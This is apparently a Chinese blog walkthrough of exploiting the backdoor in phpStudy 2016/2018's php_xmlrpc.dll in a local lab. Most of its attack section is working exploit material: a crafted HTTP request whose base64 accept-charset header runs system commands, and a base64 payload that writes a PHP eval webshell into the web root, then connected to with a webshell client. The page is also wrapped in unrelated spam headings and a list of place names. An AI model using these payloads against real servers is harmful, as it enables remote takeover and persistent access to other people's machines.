91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何使用phpstudy后門漏洞

發布時間:2021-10-18 10:51:25 來源:億速云 閱讀:400 作者:柒染 欄目:安全技術

如何使用phpstudy后門漏洞,針對這個問題,這篇文章詳細介紹了相對應的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

phpstudy軟件是國內的一款免費的PHP調試環境的程序集成包,通過集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款軟件一次性安裝,無需配置即可直接安裝使用,具有PHP環境調試和PHP開發功能,在國內有著近百萬PHP語言學習者、開發者用戶。但是存在后門漏洞,可直接getshell。

漏洞存在版本:phpStudy2016php\php-5.2.17\ext\php_xmlrpc.dllphp\php-5.4.45\ext\php_xmlrpc.dllphpStudy2018PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dllPHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

準備工作:服務器:192.168.29.135(Windows server 2008 SP2)phpStudy2016(php-5.4.45+Apache)

一.漏洞環境搭建

1.下載phpStudy2016版的phpstudy,啟動后切換至php-5.4.45+Apache版本如何使用phpstudy后門漏洞2. 查看服務器的IP地址如何使用phpstudy后門漏洞3. 直接訪問http://192.168.29.135/,可得到以下界面(以下界面是自行配置的index.php界面,可根據情況自行配置)如何使用phpstudy后門漏洞

二.漏洞成因

1. 查看文件C:\phpStudy\php\php-5.4.45\ext\php_xmlrpc.dll(這是我的安裝路徑,根據實際的安裝情況查看安裝路徑),Ctrl+F查找關鍵字“@evel”,找到了“@eval(%s('%s'));”,這也是漏洞的成因。如何使用phpstudy后門漏洞

三.漏洞復現

1.訪問URL:http://192.168.29.135/,進行抓取數據包操作,并且將其發送到repeater模塊如何使用phpstudy后門漏洞2.添加Accept-Encoding和accept-charset參數注意事項:如果沒有Accept-Encoding這個參數,需要手動加上,并且注意“gzip”和“deflate”之間存在一個逗號,并且中間沒有空格。需要手動加上:accept-charset:執行命令的base 64編碼echo system("net user");的base64編碼為

ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7--------GET / HTTP/1.1Host: 192.168.29.135User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip,deflateaccept-charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7Connection: closeUpgrade-Insecure-Requests: 1Cache-Control: max-age=0--------

執行結果為:如何使用phpstudy后門漏洞3.構造一句話木馬寫入到web路徑下:

fputs(fopen('C:\phpStudy\WWW\xx.php','w'),'<?php@eval($_POST[1])?>');

4.將構造的語句進行base64加密(刪掉下方加密中的左括號)ZnB1dHMoZm(9wZW4oJ0M6XHBocFN0dWR5XFdXV1x4eC5waHAnLCd3JyksJzw/cGhwIEBldmFsKCRfUE9TVFsxXSk/PicpOw==修改accept-charset的參數值,寫入一句話木馬如何使用phpstudy后門漏洞5.查看服務器端是否將文件寫入如何使用phpstudy后門漏洞6.使用菜刀進行連接操作,URL:http://192.168.29.135/xx.php,密碼為1如何使用phpstudy后門漏洞原文鏈接

關于如何使用phpstudy后門漏洞問題的解答就分享到這里了,希望以上內容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關注億速云行業資訊頻道了解更多相關知識。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

长葛市| 尚义县| 新建县| 武山县| 永修县| 兴和县| 开封县| 山西省| 库伦旗| 乌兰县| 琼海市| 卓资县| 东乡族自治县| 唐海县| 阿瓦提县| 新安县| 奉新县| 蒲城县| 胶州市| 凭祥市| 辛集市| 广饶县| 翁源县| 屯门区| 嵊州市| 襄樊市| 新宁县| 绵竹市| 临邑县| 成武县| 石狮市| 胶南市| 平泉县| 克拉玛依市| 华池县| 东方市| 铅山县| 牡丹江市| 轮台县| 雷州市| 额济纳旗|